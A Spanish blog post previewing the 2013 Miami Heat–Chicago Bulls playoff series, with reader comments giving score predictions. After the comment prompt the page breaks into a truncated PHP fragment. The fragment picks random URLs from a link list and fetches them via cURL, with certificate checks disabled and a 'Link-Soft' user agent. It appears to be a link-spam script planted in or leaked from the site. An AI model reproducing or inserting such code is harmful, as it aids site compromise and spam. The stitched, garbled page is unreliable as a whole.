Previa Miami Heat – Chicago Bulls

06 de May de 2013 por TheDeerHunter

Inesperada reedición de una reciente rivalidad, aunque no por ello menos enconada. Montones de momentos donde encontrar motivación. Podemos remontarnos poco tiempo, cuando los Bulls rompían la última gran racha de 27 victorias, o más lejos atrás, cuando LeBron lloró como un niño lo que no había podido defender como un hombre al final de la regular en el 2011. Después se vengaría endosándoles un 4 a 1 y devorando vivo a Rose y su equipo cabeza de serie.

Ha llovido desde entonces y los Heat de un LeBron 4 veces MVP siguen atragantándose un poco con Thibodeau y los suyos, aun sin Rose. Claro está que los resultados de la regular no son extrapolables al momento, y cualquiera con un mínimo sentido común duda entre darle la victoria a los Heat en 4 o en 5. Tampoco es que hubiera demasiada gente que apostara porque iban a eliminar al equipo de los 330 kilos, y aquí están. Los antecedentes sólo indican que ellos son de los pocos que han estado en condiciones de plantar cara a los campeones este año, que esencialmente han arrasado. Eso es decir bastante.

Con todo, en un previsiblemente empate técnico en lo psicológico, y rozando el empate en lo físico me parece que el cruce se resolverá mediante el talento. No tengo dudas que los Bulls serán capaces de plantear buena defensa, tanto como que los Heat también son aptos en ese aspecto. Pero quien está mejor preparado para asaltar esas trincheras es el mejor jugador del mundo. Si el mejor Rose estuviera disponible aún me lo plantearía.

Claves de la eliminatoria:

– Tableros: Los Heat han sido el peor equipo de la liga en rebotes. Quizá sea una circunstancia de la regular y ahora se muestren tan contundentes en ese aspecto como con Milwaukee, pero si los Bulls pretenden tener alguna oportunidad tienen que arrasar aquí. De la versión que veamos de Carlos Boozer depende una gran parte de posibilidades de evitar una barrida.

– Gotas adecuadas de caos y de control: La gran baza de los Bulls ante Brooklyn fue esa audacia casi suicida que mostraron en varios momentos, en el que una actitud convencional les llevaba a la derrota. Los Nets no lograron adaptarse adecuadamente a las alternancias caos/control que ha sido una de las diferencias con los planteamientos de Thibodeau desde que está en el equipo. Desde la, para mí, inferioridad asumida, jugar al intercambio de golpes con los Heat es derrota asegurada.

– El aspecto físico: Los Bulls han padecido graves problemas de lesiones casi en todo momento, pero ahora perfectamente podría haber costado su concurso en esta eliminatoria. Deng y Hinrinch son seria duda, como también la posibilidad crónica de que falte Noah. Por otro lado Wade es también duda. Finalmente es casi imposible, pero la presencia de Rose no está totalmente descartada.

Pronóstico: Sin partidos fáciles, pero 4-0 para Miami.

Comenta

6 comentarios a esta entrada

  1. Richon dice:
    #1

    Ya que no habeis puesto pronóstico daré el mio : 4-1 para los Heat sin forzar….demasiado lastrados fisicamente los Bulls para alargar mas la serie

      Citar

  2. Txusma dice:
    #2

    Creo que los Heat van a sudar en cada partido pero se llevaran la serie con un 4-1. Y ojo si Nate Robinson se pone on fire.

      Citar

  3. Esteban dice:
    #3

    mmmmmmmm si por casualidad vuelve rose, apuesto un 4-2 para el heat

    sin rose, al dia de hoy como estan ambos (el heat extremadamente descansdo y sano, y los bulls sin deng, hamilton, rose hinrich etc), es un 4-0 cantado para el heat

    aunque muchas veces, hay un partido que evita la barrida, me quedo con el 4-1

      Citar

  4. MagicJohnson32 dice:
    #4

    Creo que, como dice el análisis, no va a haber apenas victorias fáciles, pero los últimos cuartos de los Heat van a ser insostenibles para los Bulls. No sé, les veo plantando cara, dando muchísima guerra (y cera) pero al final no tienen suficiente talento. Espero equivocarme, pero digo 4-1.

      Citar

  5. Jose Luis dice:
    #5

    Adivina quién viene esta noche… NATE ROBINSON!!

    Miami ha estado confiado todo el partido y no se han separado en el marcador, 7 arriba en el último cuarto pero rápido empataron los Bulls. Luego Nate ha hecho el resto.

      Citar

  6. rumbero dice:
    #6

    Robinson is the man!!! Y hoy venía de la manita de Butler. Esto no se lo esperaba nadie, que pasada estos Bulls

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>